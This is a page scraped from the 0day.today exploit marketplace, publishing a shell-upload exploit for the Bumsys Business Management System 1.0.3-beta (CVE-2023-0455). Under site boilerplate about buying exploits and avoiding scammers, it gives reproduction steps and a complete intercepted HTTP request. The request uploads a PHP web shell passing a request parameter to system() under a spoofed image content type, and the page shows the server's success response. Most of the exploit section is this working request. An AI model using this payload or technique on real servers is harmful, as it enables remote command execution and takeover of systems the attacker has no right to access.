0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Bumsys Business Management System 1.0.3-beta Shell Upload Vulnerability

Author

AFFAN AHMED

Risk

[

Security Risk Critical

]

0day-ID

Category

Date add

CVE

Platform

Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload
Exploit Author: AFFAN AHMED
Vendor Homepage: https://github.com/unilogies/bumsys
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip
Version: 1.0.3-beta
Tested on: Windows 11, XAMPP-8.2.0
CVE : CVE-2023-0455


================================
Steps_TO_Reproduce
================================
- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)
- Click on action button to edit the Profile
- Click on select logo button to upload the image
- Intercept the POST Request  and do the below changes .

================================================================
Burpsuite-Request
================================================================
POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopName"

TEST
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopAddress"

 test 
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCity"

testcity
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopState"

teststate
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPostalCode"

700056
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCountry"

testIND
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPhone"

895623122
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopEmail"

test@gmail.com
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopInvoiceFooter"

 
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>


====================================================================================
Burpsuite-Response
====================================================================================
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>


====================================================================================

VIDEO-POC : https://youtu.be/nwxIoSlyllQ

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Bumsys Business Management System 1.0.3-beta Shell Upload Vulnerability

Report Error

Report Error